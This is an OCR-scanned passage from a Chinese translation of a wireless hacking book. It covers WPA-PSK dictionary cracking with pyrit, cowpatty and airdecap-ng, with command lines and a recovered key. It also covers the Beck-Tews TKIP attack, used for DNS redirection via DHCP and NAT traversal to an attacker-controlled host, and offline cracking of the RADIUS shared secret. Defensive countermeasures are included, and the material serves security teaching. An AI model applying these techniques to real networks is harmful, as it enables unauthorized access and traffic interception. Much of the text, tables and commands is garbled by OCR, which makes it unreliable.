tt3: "CEU-Core (SSE2)}': 0.0 PMKEs/s (Occ. 0.0%;: RTT 0.0) 

#4: CPU-Core (SSE2)'" 0.0 PMKS/s (Occ. 0.0%;: RTT 0.0) 


pyrit 也 可 用 于 生成 与 CoWPAtty 一 起 工作 的 预先 计算 的 散 列 表 。 由 于 pyrit 支 持 输 出 genpmk 风 格 的 散 列 表 到 标准 输出 设备 上 
(stdout， 标 准 输出 设备 ， 一 般 是 指 显示 器 。 一 一 译 者 注 ) ， 所 以 可 以 减少 其 琐 雁 的 事 (简明 的 输出 ) : 


t# pyrit -i wordilist.txt -~o - -~e HackMeUp passthrough | cowpatty —d 一 


"yy 


-2 -3 HackMeUp -Ir hackmneup-0l .cap 
cowpatty 4.6 一 WPA-PSRK dictionary attack. <JwrightR@hasborg.com> 


Collected all necessary data to mount crack against WPA?/PSK passphrase. 
Starting dictionary attack. Please be patient. 


Using STDIN for hashfile contents. 


key no. 10000: lSseaport 
key no. 20000:; J3dog162 
key no. 980000: x/ianeoscg8 
key no. 990000: zigzagulez 
The PSK 13 "psk-elecOne" 


在 Windows 加 速 破解 ”Elcomsoft 是 俄罗斯 安全 软件 公司 ， 它 专门 制作 在 Windows 上 运行 的 密码 破解 工具 。Elcomsoft 分 
布 式 密码 恢复 (Elcomsoft Distributed Password Recovery，EDPR) 工具 支持 跨 多 个 系统 的 分 布 式 密码 破解 。EDPR 的 优点 是 
它 在 每 一 个 EDPR 客 户 端 所 运行 的 系统 上 也 支持 对 GPU 的 破解 。EDPR 是 一 个 商业 工具 ， 所 以 你 将 犹豫 是 否 要 人 花 这 一 大 笔 钱 。 此 
外 ， 该 工具 不 支持 字典 破解 ， 只 是 普通 的 暴力 破解 。 然 而 ， 因 为 写本 书 的 时 候 ， 许 多 事情 可 能 有 所 改变 ， 所 以 一 定 要 在 购买 前 重 
新 看 一 下 功能 列表 ! Elcomsoft 的 EDPR 的 截图 如 下 图 所 示 。 
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天 于 GPU 破 解 的 最 好 部 分 的 价格 很 高 ， 一 张 好 的 视频 卡 要 花费 200 美 元 左右 ， 这 种 卡 可 以 得 到 一 秒 11000 个 密码 短语 ! 


在 OS X 上 破解 WPA-PSK ”除了 在 OS X 上 编译 Aircrack-ng 或 coWPAtty 外 ， 你 还 可 以 使 用 KisMAC 内 置 的 对 字典 攻击 的 支 
持 。 简 单 地 选择 一 个 正确 的 网 络 ， 并 单 击 Crack (破解 ) |Wordlist Attack (字典 攻击 ) |Against WPA Key (针对 WPA 密 钥 ) ， 


字典 。 如 果 一 切 顺 利 的 话 ， 你 会 看 到 像 这 样 的 消息 。 


破解 成 功 


KisMAC 已 经 找到 了 所 选 


值 ，00:23:6C:98:7C:TC 。 


加 速 破 解 比较 的 总 结 ”总 结 了 前 面 所 摘 述 的 加 速 破解 方法 的 成 本 和 速 大 。 


方 法 速度 
Intel Core 2 Duo 3 GHz 弥 110 个 密 钥 /种 
(coWPAtty) 


Intel Core 2 Duo 3 GHz 约 175 个 密 钥 /种 


(Alrcrack-ng) 

预先 计算 的 散 列 表 

Pico E-12 (Virtex-4 L235) 
- FPGA 


约 7 万 小 密 钥 /种 


约 430 个 密 钥 / 秒 
CreForce 280 GTX - CUDA 约 11 000 个 密 钥 /种 


最 有 效 的 方法 无 疑 是 使 用 预先 计算 的 散 列 表 。 然 而 ， 大 多 数 时 候 
用 的 密码 短语 。 对 于 暴力 破解 ，CUDA 的 破解 速度 是 


会 ”解密 WPA-Psk 捕 获 的 数据 包 


， 这 些 表 中 不 存在 你 目标 的 SSID， 所 以 它们 可 能 
最 快 的 ， 并 让 你 得 到 最 大 的 利益 ， 这 一 点 是 明确 的 ! 


网络 misspiggy 的 密 镭 


OK 


成 本 
约 120.00 美 元 


约 120.00 美 元 


免费 ! (假设 你 有 足够 的 硬盘 空间 ) 


约 1000.00 美 元 


维 240.00 美 元 


\ 包 合 所 


nh 


“hh 


好 了 ， 要 么 我 们 已 经 成 功 地 暴力 破解 了 WPA-PSK 握 手 ， 要 人 么 我 们 已 经 知道 了 密 钥 。 无 论 如 何 ， 我 们 希望 我 们 能 够 读 到 其 他 
用 户 的 数据 包 。 你 可 能 认为 这 是 一 件 容易 的 事 ， 但 这 里 有 一 个 问题 : 当 用 户 与 网 络 相 关联 的 时 候 会 产生 一 个 独特 的 成 对 临时 密 钥 
(Pairwise Transient Key，PTK) 。 尽 管 我 们 有 密码 短语 或 者 PMK， 但 我 们 不 知道 所 生成 的 PTK 是 什么 ， 除 非 我 们 还 捕获 了 它 
们 会 话 的 握手 。 如 果 我 们 有 PMK， 并 且 想 噢 探 另 一 个 用 户 的 连接 ， 则 我 们 不 得 不 先 强 制 客户 端 断 开 连 接 (例如 ， 使 用 解除 认证 
攻击 ) ， 然 后 捕获 他 们 的 握手 以 便于 我 们 可 以 从 中 推导 出 PTK。 对 于 所 有 人 允许 我 们 破解 密 通信 数据 包 的 工具 ， 我 们 需要 让 捕获 中 
的 握手 成 功 地 破解 它 。 


使 用 Wireshark 来 解密 通信 数据 包 Wireshark 提 供 了 内 置 的 流量 解密 功能 ， 该 功能 针对 的 是 由 WPA 和 WEP 加 密 的 数据 包 。 
Wireshark 接 收 PMK 或 密码 短语 对 WPA 数 据 包 进行 解密 ， 并 且 只 要 在 捕获 中 发 现 握手 操作 ， 就 能 自动 执行 解密 操作 。 要 在 
Wireshark 中 指定 一 个 密 钥 ， 需 要 执行 Edit (编辑 ) |Preferences (偏爱 ) 功能 ， 然 后 从 左 侧 Protocol (协议 ) 列表 中 选择 IEEE 
802.11， 选 中 Enable Decryption (启用 解密 ) 复 选 枉 ， 然 后 在 任何 一 个 密 钥 值 (Key#N ) 输入 框 中 输入 一 个 密 钥 (Wireshark 
1.0.0 版 本 有 多 达 64 个 输入 框 。 译 者 注 ) 。 密 码 短语 可 以 用 wpa-pwd: 密码 格式 (其 中 的 密码 就 是 实际 的 密码 ) 指 
定 ，PMK 可 以 用 wpa-psk: PMK 格 式 (其 中 的 PMK 就 是 实际 的 PMK 值 ) 。 我 们 可 以 在 每 一 个 输入 框 中 指定 多 个 密 钥 值 ， 甚 至 
用 一 个 SSID 关 联 一 个 密 钥 值 。 


Wireshark; Preftereneces 
IEEE 802.11 wireless LAN 


Reassemble fragmented 802.11 datagrams 
Iognere vendorspedaticHl elerments 
Call subdissector for retransmitted 802.11 frames 
AssUIMme packets have FCS 
lIanore the Protection bit Ni Tes = Without lv 
Enable decryptlaon 活 


Key examples: O01:02:03:04:05 (40/64-bit WEP), 


010203040506070809101111213 (104/128-bit WEP). 


wpa-pwd:MyPassword[:MyAP] (WPA + plaintext password [+ SSID]) 


wpa-psk:0102030405...6061626364 (WPA + 256-bit key). Invalid keys will be ignored 


在 airdecap-ng 下 使 用 airdecap-ng 是 包含 在 Aircrack-ng 套 件 中 的 另 一 个 工具 。 与 Wireshark 一 样 ，airdecap-ng 将 让 我 
们 解密 由 WPA 和 WEP 加 密 的 数据 包 ， 并 且 既 接收 密码 短语 又 接收 PMK。 假 设 你 要 对 前 面 例子 中 使 用 的 同一 个 pcap 文 件 进行 解 
密 操作 ， 那 么 你 可 以 友 出 以 下 命令 : 


# airdecap-ng -~e HackMeUp -P psk-elecOne hackmeup-01.cap 
Total number of packets read 3231698 
Total number of WEP data packets D 
Total number of WPA data packets J013 
Number of plaintext data packets D 
Number of decrvypted WEP packets U 
Number of corrupted WEP packets D 
Number of decrypted WPA packets 和 4 74 


如 果 我 们 得 到 0 个 解密 的 WPA 数 据 包 ， 则 密码 是 错误 的 ， 或 者 SS1D 是 错误 的 ， 再 或 者 在 pcap 文 件 中 没有 握手 。 没 有 握手 是 
失败 最 常见 的 原因 。 一 旦 airdecap-ng 已 完成 ， 就 在 当前 目录 中 创建 一 个 名 为 hackmeup01dec.cap 的 文件 。 如 果 我 们 以 某 种 方 
式 成 功 地 破解 了 PMK， 但 没有 破解 密码 短语 ， 那 么 我 们 可 以 通过 -k 参 数 将 PMK 直 接 导入 到 airdecap-ng 中 。 


@ 避 六 WPA-_PSK 


防止 WPA-PSK 攻 击 的 最 有 效 方法 是 在 可 能 的 情况 下 选择 一 个 好 的 密码 短语 和 避免 TKIP 操 作 。 不 用 说 ， 字 典 中 的 字 是 要 排除 
在 外 的 ， 不 能 用 作 密 码 。 而 且 ， 大 多 数 操作 系统 不 要 求 你 每 次 都 输入 密码 ， 所 以 不 要 因为 让 用 尸 记 住 长 的 随机 字符 串 而 感 完 到 不 
妙 。 他 们 仅仅 需要 在 输入 密码 的 时 候 记 住 一 次 束 行 了 。 然 后 惑 可 以 一 如 往 弟 定期 修改 密码 ， 融 永远 不 会 造成 伤害 。 


另外 一 个 很 好 的 威慑 物 是 选择 一 个 唯一 的 SSID。 如 果 SSID 是 linksys， 有 人 很 可 能 已 经 为 这 个 SSID 计 算 了 一 个 散 列 表 。 远 离 
这 个 默认 的 SSID， 或 者 考虑 将 一 个 随机 数字 追加 到 某 个 字 的 结束 (例如 ，Unique-01923) ， 也 不 失 为 一 个 好 办 法 。 


最 后 ， 即 使 攻击 者 获得 了 PMK， 他 也 需要 捕捉 到 一 次 握手 才能 进而 获得 你 的 PTK。 大 多 数 攻 击 者 完成 这 一 操作 是 通过 首先 
传递 一 个 解除 认证 数据 包 给 受害 人 。 尽 管 还 没有 一 个 非常 可 行 的 防御 方式 〈 因 为 操作 系统 /驱动 程序 编写 者 不 愿意 包括 这 一 功 
能 ) ， 但 忽略 解除 认证 数据 包 的 能 力 将 会 使 攻击 者 需要 克服 更 多 的 障碍 。 


4.2 ”破解 认证 : WPA 企 业 模 式 


大 多 数组 织 利用 WPA Enterprise (WPA 企 业 ) 模式 进行 部 署 。 它 提供 了 认证 的 细 粒 度 控 制 ， 这 种 控制 使 整体 安全 性 变 得 更 
好 。WPA Enterprise 通 过 EAP 的 使 用 支持 各 种 身份 认证 方案 。 这 些 方案 中 的 一 些 被 认为 是 比 其 他 方案 更 安全 。 


提示 ”如果 你 不 熟悉 RADIUS、802.1X 和 EAP 交 互 的 细节 ， 那 么 请 详 见 第 1 章 。 对 于 RADIUS、802.1X 和 EAP 交 互 的 详细 分 
析 ， 可 以 参考 802.11 在 其 伙伴 网 站 上 的 背景 章节 ， 网 址 是 http://www.hackingexposed.com。 


4.3 ”破解 加 密 :TKIP 


虽然 TKIP 算 法 比 WEP 有 巨大 的 进步 ， 但 它 仍然 是 基于 相同 的 RC4 加 密 算法 进行 的 ， 从 而 很 容易 存在 相同 的 问题 。 在 本 节 
中 ， 我 们 将 研究 针对 TKIP 算 法 所 存在 的 已 天 的 和 可 利用 加 密 攻击 。 


@ “Beck-Tews 攻 击 


2008 年 ，Martin Beck 和 Erik Tews 发 表 了 一 篇 题 为 “Practical Attacks Against WEP and WPA” 的 论文 。 在 这 篇 文章 
中 ， 他 们 提出 对 WEP 的 改进 攻击 和 和 针对 WPA 的 TKIP 的 令 人 吃惊 的 密 钥 流 (不 是 PMK) 恢复 攻击 。 他 们 友 现 : TKIP 也 是 与 WEP 
一 样 基于 相同 的 RC4 算 法 ， 所 以 在 理论 上 也 容易 受到 ChopChop 攻 击 。TKIP 采 用 的 是 在 每 当成 功 处 理 一 帧 数据 时 ， 就 将 TKIP 序 
列 计数 器 (TKIP sequence Counter，TSC) 增加 1 的 方式 保护 它 免 受 攻击 。 这 样 做 可 以 消除 重 放 有 效 帧 的 能 力 ， 而 这 种 拉 术 正 
是 ChopChop 攻 击 所 依赖 的 。 虽 然 这 一 切 都 是 已 知 的 ， 但 他 们 利用 这 个 知识 点 ， 利 用 它 和 一 些 802.11 规 荡 的 变化 组 合 起 来 ， 从 
而 实现 一 个 令 人 印象 深刻 的 攻击 。 


随 着 2005 年 IEEE 802.11e 的 推出 ， 无 线 网 络 可 以 支持 基于 需求 的 优先 级 流量 控制 。 通 信 数 据 包 按 逻辑 分 组 ， 并 以 不 同 的 访 
问 类 别 (例如 ， 队 列 / 信 道 ) 传输 。 这 些 访问 类 别 保持 自己 的 TKIP 序 列 计数 器 ， 也 意味 着 使 用 TKIP 的 重 放 保 护 很 弱 ， 很 容易 受到 
ChopChop 攻 击 。 


此 外 ， 可 以 对 ChopChop 攻 击 进行 修改 以 便 它 更 有 效 地 工作 。 使 用 小 的 、 可 预见 的 数据 包 ， 减少 解密 所 需 的 字 方 数 是 可 能 
的 。 例 如 ， 一 个 广播 ARP 帧 中 大 多 数 是 静态 的 (因此 也 是 已 知 的 ) ， 除 了 5 字 节 用 于 标识 源 IP 地 址 和 目的 IP 地 址 外 ，8 字 节 用 于 标 
识 TKIP 的 消息 完整 性 代码 (Message Integrity Code，MIC) 密 铀 ， 以 及 4 字 节 的 ICV 校 验 和 。 这 总 共 17 字 节 ， 如 果 IP 地 址 的 前 
3 字 节 可 以 猜 到 (假设 使 用 的 是 符合 RFC1918 规 范 的 一 个 C 类 网 络 地 址 ) ， 则 可 以 进一步 减少 到 只 有 14 字 节 。 


既然 我 们 有 了 所 有 这 些 信息 ， 让 我 们 来 看 看 完成 TKIP 解 密 的 完整 过 程 。 这 个 过 程 如 图 4-3 所 示 。 
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图 4-3 ” TKIP 解密 过 程 


利用 IEEE 802.11e 的 访问 类 别 ，TKIP 的 第 一 个 应 对 措施 TKIP，TSC 首 先 被 击败 。 按 照 这 一 方式 ， 我 们 可 以 通过 已 经 选择 的 广 
播 ARP 帧 ,执行 对 ICV 和 MIC 密 钥 上 的 ChopChop 攻 击 (ChopChop 是 在 前 面 的 章节 中 已 详细 摘 述 了 的 攻击 算法 ) 。 我 们 假定 这 
是 一 个 广播 ARP 帧 ， 因 为 它 有 68 字 节 的 长 度 ， 用 于 指定 广播 以 太 网 地 址 (例如 FF:FF:FF:FF:FF:FF) 。 为 了 搞 清楚 我 们 的 
ChopChop 猜 测 是 正确 的 ， 我 们 查看 一 个 MIC 失 败 的 帧 。 由 于 不 正确 的 ICV 值 会 被 悄悄 地 丢弃 掉 ， 所 以 一 个 MIC 失 败 的 帧 说 明 
ICV 是 正确 的 ， 但 MIC 是 错误 的 ， 因 而 导致 失败 。 在 正常 情况 下 ， 这 些 MIC 失 败 是 不 应 该 发 生 的 ， 所 以 如 果 在 1 分 钟 内 发 生 两 次 


MIC 故 障 ， 那 么 说 明 TKIP 内 的 另 一 个 应 对 措施 完全 关闭 。 为 了 解决 这 个 问题 ， 在 每 一 个 1CV 的 字 节 猜测 都 正确 (例如 ，MIC 错 
误 ) 后 我 们 等 待 1 分 钟 。 在 现实 的 应 用 中 ， 解 密 MIC 和 ICV 将 需要 大 约 20 分 钟 的 时 间 ; 然后， 在 最 理想 的 情况 下 ， 可 能 只 需要 12 
分 钟 (1 分 钟 1 个 字 节 ) 。 一 旦 我 们 解密 了 MIC 和 ICV， 我 们 融 可 以 通过 猜测 值 和 计算 新 的 帧 的 ICV 来 确定 IP 地 址 的 各 个 字 节 。 如 
果 计 算 的 ICV 和 解密 的 ICV 匹 配 ， 襄 明 我 们 猜 中 了 ! 该 过 程 显示 在 图 4-4 中 。 


通过 一 个 完全 解密 的 802.11 帧 ， 我 们 可 以 使 用 这 些 密 钥 流 来 创建 我 们 自己 的 等 长 或 更 小 尺寸 帧 ， 这 些 密 钥 流 是 通过 相同 帧 
的 解密 版 本 和 加 密 版 本 进行 “ 异 或 ”运算 而 得 来 的 。 对 于 一 个 广播 ARP 帧 ,我 们 可 以 创建 男 一 个 最 长 可 达 68 字 市 的 帧 。 应 该 指 
出 ， 广 播 ARP 帧 在 这 里 仅仅 是 作为 一 个 例子 ， 你 也 可 以 使 用 如 DHCP、DNS 和 ICMP 等 数据 包 ， 这 可 能 会 导致 更 多 有 效 的 字 节 。 


IEEE 802.11e 支 持 4~16 个 可 访问 的 类 别 ， 大 多 数 网 络 只 在 访问 类 别 0 上 进行 传输 ， 这 意味 着 我 们 可 以 通过 注入 增加 到 15 个 


帧 ， 因 为 大 多 数 其 他 类 别 将 有 较 低 的 TKIP 序 列 计数 器 。 我 们 的 通信 数据 包 只 能 从 AP 到 客 己 新， 因为 这 种 攻击 依赖 MIC 失 败 的 
帧 ， 这 种 帧 只 能 由 客 尸 端 友 出 。 


tkiptun-ng 工 具 是 Aircrack-ng 套 件 的 一 部 分 ， 它 试图 实现 这 种 攻击 。 访 工具 仍 处 于 开 友 阶段 ; 但 是 ， 一 些 独立 制作 程序 通 
过 打 补 本 的 方式 已 仔 企 了 ， 见 随后 的 摘 述 。 


使 用 DHCP， 提 高 Beck-Tews 攻 击 “2009 年 6 月 ，Finn Michael Halvorsen 和 Olav Haugen 友 表 了 题 为 “Cryptanalysis of 
IEEE 802.11i TKIP” 的 论文 ， 该 论文 概述 了 Beck-Tews 攻 击 ， 以 及 一 个 有 利于 收集 较 大 密 钥 流 的 报 文 。 这 可 以 转换 成 更 多 的 可 
用 的 字 节 ， 可 以 创建 更 大 的 数据 包 。 通 过 使 用 DHCP ACK， 它 可 能 创建 384~584 字 节 的 帧 。 甚 至 DHCP 事 务 ID 可 以 通过 
ChopChop 攻 击 锐 暴露 ， 该 攻击 可 以 用 在 稍 后 介绍 的 更 为 复杂 的 攻击 中 。 此 外 ， 论 文 作者 还 提供 了 一 个 对 tkiptun-ng 扩 展 的 工 
具 ， 可 以 实现 这 种 攻击 。 
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图 4-4 ”Beck-Tews 的 TKIP 攻 击 


实际 应 用 ”在 他 们 的 论文 中 ，Finn Michael Halvorsen 和 Olav Haugen 还 概述 了 这 种 攻击 的 两 个 实际 应 用 : 使 用 DHCP 修 
改 客户 端的 DNS 和 和 NAT 穿越 。 他 们 还 提供 tkiptun-ng 的 补丁 ， 使 用 该 补丁 的 程序 实际 上 可 以 展示 这 种 攻击 。 这 些 补丁 程序 可 以 
从 Aircrack-ng 跟 路 系统 的 ticket 目 录 下 的 684 子 目录 中 找到 (http://trac.aircrack-ng.org/ticket/684) 。 


. HCP 使 用 DNS 同时 使 用 DHCP 的 ACK 确 认 数 据 包 和 ARP 数 据 包 可 以 发 动 两 个 TRIP 攻 击 ， 我 们 可 以 通过 强 连 客户 端 访问 一 


侣 被 我 们 控制 的 DNS 域 名 服务 器 ， 来 定位 找到 DHCP 客 户 端 。 要 做 到 这 一 点 ， 我 们 需要 通过 注入 带 有 相 匹 配 IP 地 址 的 假 的 ARP 请 
求 客户 端 ， 使 客户 端 相 信 另 一 台 主 机 和 它 之 间 存 在 中 冲突 。 在 特定 的 操作 系统 中 ， 为 了 结束 这 类 冲突 ， 客 户 端 会 发 送 一 个 新 的 
DHCP 请 求 ， 我 们 将 响应 该 请 求 。 我 们 的 DHCP ACK 响 应 将 包含 我 们 控制 的 DNS 服务 器 ， 这 将 最 终 使 我 们 能 够 控制 客户 端的 通信 


流量 ， 然 而 ， 当 IP 冲 突 发 生 后 ， 在 Windows XP 和 其 他 一 些 操 作 系统 中 并 不 能 观察 到 这 个 行为 。 图 4-5 详 细 描 述 了 这 个 攻击 。 
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ARP 注 入 到 STA 


ARP; 二 入 利 STA 


观察 从 STA 发 出 的 


“下 DHCP 请 求 


当前 实现 方式 ，tkiptun-ng，48 个 字 
的 密 钥 诚 ，ITSC=Y 


设 有 人 各 开 的 实现 ，596 沾 字 有 的 密 
钼 请，TSC= 立 


导致 寡 户 并 考虑 存在 一 
， 这 将 导致 下 面 的 


这 和 将 {希望 ) 
外 IEP 地 址 的 中 突 
DHCP 诗 求 


DN 
”服务 三 利 用 客站 词 漏 简 


注入 带 悉 意 DNS 有 的 假 
电 上 的 DHCP Qos chan=6, 
工 入 (一 下 


图 4-5 ”DHCP DNS 攻击 


. NAT 穿越 NAT 穿越 攻击 涉及 使 用 TKIP 攻 击 创建 一 个 在 无 线 客户 端 和 攻击 者 控制 的 外 部 主机 之 间 的 会 话 ， 该 控制 绕 过 了 
防火 墙 的 限制 。 我 们 创建 一 个 TCP SYN 数 据 包 ， 该 数据 包 发 起 于 我 们 选择 端口 上 的 一 个 外 部 IP 地 址 (该 地 址 受 我 们 控制 ) ， 然 后 
直接 连 在 客户 端 上 。 当 客户 端 系统 收 到 此 数据 包 时 ， 它 会 用 一 个 SYN/ACK 响 应 我 们 的 外 部 服务 器 ， 并 且 在 两 台 主 机 之 间 的 防火 
墙 NAT 表 中 创建 一 个 和 入口。 伴随 着 这 一 会 话 的 建立 ， 我 们 就 可 以 发 动 针对 我 们 在 TCP SYN 数 据 包 中 定义 的 选择 端口 的 攻击 。 这 


个 过 程 如 图 4-6 所 示 。 


攻击 者 给 目标 卫 、 端 口 注 入 SYN。 
给 外 部 主机 设置 源 地 址 
外 部 主机 可 以 与 受害 者 通信 


| 
| > 
| 
| 


受 宝 者 用 SYN/ACK 
| 啊 应 外 部 主机 -和 


AP 更 新 NAT 映 射 未。 元 许 外 部 
主机 和 受害 者 之 间 的 数据 包 


图 4-6 NAT 徊 越 攻 击 


图 BeclkcTews TKIP 攻 击 应 对 措施 


当前 的 建议 是 完全 禁用 TKIP， 并 在 你 的 无 线 网 络 中 将 它 蔡 换 为 AESCCMP。 然 而 ， 如 果 确 实 需 要 TKIP， 你 可 以 配置 密 钥 轮 
换 的 时 间 间 隔 为 较 低 的 值 。 由 于 Beck-Tews TKIP 攻 击 需 要 相当 长 的 时 间 来 执行 (最 基本 的 情况 约 需 15~20 分 钟 ) ， 因 此 如 果 接 
入 操 配 置 轮换 密 钥 为 较 短 的 时 间 间 隅 (每 5 分 钟 或 10 分 钟 ) ， 那 么 攻击 者 将 无 法 执行 一 个 完整 的 ChopChop 攻 击 。 此 外 ， 如 果 攻 
击 者 能 够 完成 ChopChop 攻 击 ， 那 么 他 需要 在 密 钥 轮换 之 前 注入 他 创建 的 帧 。 降 低 密 钥 轮换 间隔 可 以 对 网 络 连 接 产 生 负 面 影 响 

(特别 是 在 WPA-Enterprise 环 境 中 ) ， 所 以 一 定 要 在 整个 组 织 中 部 署 该 设置 之 前 进行 充分 的 测试 。 


男 一 个 实际 的 建议 是 在 AP 上 禁用 QoS。 当 然 ， 如 果 你 真 的 这 样 做 ,会 对 你 的 流量 产生 负面 的 影响 。 


最 后 ， 因 为 这 种 攻击 依赖 MIC 失 败 帧 来 确定 猜测 的 字 节 是 否 正 确 ， 所 以 针对 这 些 事件 设置 特别 的 IDs 警 报 可 以 帮助 减轻 攻 
击 : 


4.4 ”攻击 组 件 


如 果 正 确 配置 WPA， 那 么 WPA 网 络 很 难 被 破坏 。 在 录 毕 网 络 中 ， 可 能 没有 身份 认证 或 加 密 的 漏洞 ， 使 我 们 能 够 超越 传统 的 
攻击 。 从 我 们 的 (也 就是 ， 攻 击 者 的 ) 角度 来 看 ，WPA 的 一 个 好 处 是 许多 新 的 网 络 组 件 必 须 在 合适 的 位 置 ， 以 方便 认证 。 这 些 
新 组 件 加 大 了 整体 攻击 面 ， 从 而 在 网 络 上 提供 更 多 的 潜在 向 量 。 本 书 着 眼 于 一 些 组 件 和 它们 的 攻击 同 量 。 


全 “FAP 攻击 面 


用 一 上 


影响 力 


地 5 


WPA Enterprise (WPA 企 业 ) 认证 的 一 个 有 趣 方 面 是 ， 大 部 分 的 通信 和 是 未 经 认证 的 客户 问 和 有 线 网 络 上 的 认证 服务 器 之 间 
的 通信 (对 于 这 个 过 程 的 快速 浏览 请 参阅 第 1 章 ， 非 常 详细 的 说 明 请 参阅 本 书 的 在 线 网 站 ) 。 在 无 线 网 络 范围 内 的 任何 人 都 可 以 
查询 EAP 服 务 器 。 此 外 ， 因 为 EAP 消 息 是 中 继 传 输 的 ， 并 且 很 少 通过 接 入 点 进行 解析 ， 所 以 你 有 机 会 破坏 AP 或 对 AP 进 行 拒 绝 服 
务 攻击 。 
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在 RADIUS 服务 器 和 AP 处 理 的 EAP 数 据 包 中 已 友 现 了 漏洞 ， 这 可 以 提供 一 个 攻击 的 途径 。 使 用 什么 信息 识别 环境 中 正在 部 署 
的 硬件 和 软件 是 非 单 重 要 的 。 如 果 漏 洞 和 漏洞 利用 存在， 那么 我 们 也 许 能 够 找到 一 种 到 RADIUS 服务 器 或 AP 快捷 的 方式 。 人 否则 ， 
下 一 步 就 是 要 尽量 在 实验 室 环 境 中 模仿 目标 网 络 ， 以 便 友 现 所 使 用 的 软件 /硬件 方面 的 新 漏洞 。 


模糊 测试 是 在 测试 应 用 程序 接受 各 个 领域 不 同 的、 意外 的 值 的 过 程 。 在 这 种 情况 下 ， 应 用 程序 将 是 RADIUS 服务 器 ， 我 们 测 
试 的 各 个 领域 是 那些 使 用 的 EAP 类 型 。 由 于 我 们 尝试 的 值 几乎 从 不 出 现在 现实 世界 中 ， 所 以 应 用 程序 可 能 也 不 知道 如 何 处 理 它 
们 ， 这 可 能 会 导致 朋 溃 。 月 溃 不 仅 导 致 拒绝 服务 的 情况 ， 而 且 也 表明 存在 一 个 更 严重 漏洞 的 可 能 性 。 


人 @ 减 少 攻击 面 


束 像 所 有 其 他 服务 器 和 设备 一 样 ， 保 持 你 的 无 线 基础 设施 使 用 最 新 的 补丁 程序 是 降低 攻击 的 风险 的 关键 。 此 外 ， 考 虑 在 每 个 
组 件 的 安全 审查 上 进行 一 些 投资 ， 以 确保 它们 的 配置 是 正确 的 和 不 存在 模糊 的 配置 。 


鸭 ” 通过 RADIUS 攻击 PMK 的 传送 


-加 


| 


鉴定 所 有 参与 攻击 一 个 正确 配置 的 WPA Enterprise (WPA 企 业 ) 网 络 的 复杂 性 ， 你 可 能 会 疑惑 是 不 是 根本 就 没有 一 个 简单 
的 方法 来 绕 过 所 有 这 些 认 证 协议 。 一 个 可 看 的 地 方 就 是 通过 RADIUS 从 认证 服务 器 向 AP 提供 PMK 传 送 ， 如 果 你 能 意识 到 这 一 
点 ， 那 你 真 够 牛 的 。 如 果 你 能 观察 到 PMK 以 某 种 方式 从 有 线 局 域 网 传送 到 接 入 点 ， 那 么 你 就 可 以 观察 到 四 次 握手 ， 并 且 获 得 用 
尸 的 PTK。 这 样 做 束 完 全 回避 了 EAP 认 证 ， 并 且 不 依赖 于 客 尸 端 使 用 RC4 还 是 AES 对 到 接 入 点 的 数据 包 进 行 加 密 。 随 着 赌注 定 得 
很 高 ， 你 会 认为 一 些 非常 严重 的 加 密 是 需要 保护 的 密 钥 传 送 。 你 会 瞬间 看 到 : 虽然 用 于 保护 PMK 传 送 的 密码 足够 了 ， 然 而 用 来 
保护 密 钥 传送 的 密 钥 却 不 够 。 以 下 攻击 是 可 行 的 ， 因 为 RADIUS 共 享 密 钥 (简称 为 RADIUS 密 钥 ) 用 于 两 个 目的 一 一 带 有 ， 巨 大 
的 后 果 的 设计 决定 。 


在 深入 研究 这 个 攻击 之 前 ， 我 们 必须 强调 ， 为 了 使 这 种 攻击 成 功 ， 攻 击 者 必须 已 经 在 有 线 局 域 网 上 和 存在 了 一 段 时 间 。 攻 击 者 
不 仅 必 须 是 在 有 线 网 络 中 的 某 个 地 方 ， 而 且 她 已 经 能 够 在 接 入 点 和 RADIUS 服 务 器 之 间 确 定 目 己 的 位 置 。 根 据 网 络 体系 结构 ， 这 
种 操作 可 能 极其 困难 。 对 于 讨论 的 其 余部 分 ， 我 们 假设 攻击 者 可 以 以 某 种 方式 观察 到 接 入 点 和 RADIUS 服 务 器 之 间 的 通信 数据 
包 . 


如 果 攻 击 者 可 以 嗅 探 到 RADIUS 的 通信 数据 包 ， 那 么 该 网 络 正 处 于 危险 中 。RADIUS 协 议 使 用 MD5 作 为 其 认证 的 基础 。 给 每 
个 接 入 点 一 个 RADIUS 共 享 密 钥 ， 尽 管 希望 不 是 这 样 ， 但 网 络 中 的 每 一 个 接 入 点 很 可 能 会 使 用 相同 的 共享 密 钥 。 在 这 两 种 情况 
下 ， 如 果 攻 击 者 可 以 在 一 定 程度 上 别 出 RADIUS 通 信 数 据 包 ， 那 么 常常 被 忽略 安全 万 面 是 你 最 后 一 道 防线 。 


这 个 攻击 的 第 一 个 阶段 包括 让 接 入 点 与 RADIUS 服 务 器 通信 。 这 个 阶段 不 要 求 客 尸 并 成 功 地 进行 身份 认证 ， 所 以 最 简单 的 束 
是 尝试 连接 。 当 接 入 点 和 RADIUS 服 务 器 交换 消息 ， 它 们 包括 一 个 称 为 Response Authenticator (回应 认证 ) 的 字段 。 接 入 所 
和 RADIUS 服 务 器 使 用 这 个 字段 确保 消息 不 会 被 不 可 信 的 各 方 欺 骗 。 为 了 计算 这 个 字段 ， 消 息 的 友 送 方 需要 知道 RADIUS 密 钥 


Response Authenticator 等 于 
MD5 (代码 +ID+ 长 度 + 请 求 认证 属性 +RADIUS 窗 钥 ) 
最 重要 的 是 RADIUS 密 钥 是 RADIUS 数据 包 中 唯一 不 在 明文 中 的 字段 。 


一 旦 攻击 者 嗅 探 到 一 个 市 有 Response Authenticator 的 数据 包 ， 那 么 她 残 可 以 安 妆 离线 字典 攻击 来 计算 RADIUS 密 铀 。 基 
本 上 ， 她 将 只 计算 MD5 (代码 +1D+ 长 度 + 请 求 认 证 属性 + 字典 中 的 词 ) ， 直 到 她 得 到 正确 的 散 列 值 。 一 旦 她 得 到 正确 的 散 列 
值 ， 她 融 知 道 了 RADIUS 密 钥 。 


考虑 到 RADIUS 密 钥 给 攻击 者 的 能 力 (特别 是 ， 如 果 是 在 多 个 设备 中 使 用 的 密 钥 ) ， 你 可 以 假设 她 这 样 做 将 化 费 大 量 的 资 
源 。 此 外 ， 由 于 MD5 非 常 普遍 ， 因 此 不 存在 这 样 的 不 足 ， 即 高 度 优化 的 代码 (甚至 是 硬件 ) 可 以 通过 浮动 运算 加 快 MD5 的 计 
算 。 最 后 ， 即 使 需要 花费 攻击 者 整整 一 个 月 来 还 原 密 钥 ， 但 它 仍 然 有 可 能 被 使 用 。 但 轮换 的 RADIUS 密 钥 在 许多 设备 上 实现 并 不 


是 件 容 易 的 事 。 


